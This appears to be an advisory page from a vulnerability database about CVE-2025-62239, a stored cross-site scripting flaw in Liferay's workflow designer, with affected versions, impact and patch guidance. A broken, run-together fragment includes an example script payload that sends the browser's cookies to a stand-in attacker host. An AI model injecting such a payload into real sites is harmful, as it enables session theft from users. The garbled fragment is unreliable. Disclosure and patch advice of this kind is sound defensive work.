
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-62239 is a stored Cross-Site Scripting (XSS) vulnerability in the workflow process builder component of Liferay Portal and Liferay DXP. It allows remote authenticated attackers to inject arbitrary web script or HTML via crafted input within a workflow definition. Affected versions include Liferay Portal 7.4.3.21 through 7.4.3.111, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.8, and 7.4 update 21 through update 92. The vulnerability was published on October 10, 2025, with a CVSS v3.1 score of 5.4 (Medium) and a CVSS v4.0 score of 4.6 (Medium) (GitHub Advisory, Liferay Security).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), rooted in insufficient sanitization of user-supplied input in the workflow process builder's definition fields (GitHub Advisory). An authenticated attacker with sufficient privileges to modify workflow definitions can embed malicious JavaScript or HTML payloads that are later rendered in other users' browsers when they view or interact with the affected workflow. The attack requires low complexity, network access, and user interaction from a victim, but does require the attacker to hold elevated (high) privileges to access the workflow definition editor. The fix was applied to the Maven package com.liferay:com.liferay.portal.workflow.kaleo.designer.web, patched in version 5.0.124 (GitHub Advisory).
Successful exploitation allows an attacker to execute arbitrary client-side scripts in the browsers of other users who view the compromised workflow definition, resulting in low confidentiality and integrity impacts on the vulnerable system. Potential consequences include session token theft, credential harvesting, unauthorized actions performed on behalf of victims, and manipulation of web page content displayed to other portal users (GitHub Advisory, Liferay Security). Availability is not impacted, and there is no direct impact on subsequent systems beyond the browser context of affected users.
As of the time of disclosure, there is no public proof-of-concept exploit and no evidence of in-the-wild exploitation (GitHub Advisory). The EPSS score is approximately 0.028% (8th percentile), indicating a low near-term probability of exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported.
<script>document.location='https://attacker.example/steal?c='+document.cookie</script>) into a workflow definition field that is rendered without proper output encoding./o/headless-admin-workflow/v1.0/workflow-definitions or the Kaleo Designer portlet URL) containing encoded HTML or JavaScript in request bodies.<script> tags or JavaScript event handlers.Liferay has released patches addressing this vulnerability: upgrade Liferay Portal to version 7.4.3.112 or later, Liferay DXP 2023.Q4 to version 2023.Q4.6 or later, and Liferay DXP 2023.Q3 to version 2023.Q3.9 or later. For DXP 7.4, the fix is included in the patched Maven component com.liferay.portal.workflow.kaleo.designer.web version 5.0.124 (GitHub Advisory, Liferay Security). As interim workarounds, administrators should restrict workflow definition modification permissions to the minimum necessary set of trusted users, implement strict input validation, and audit existing workflow definitions for suspicious content.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."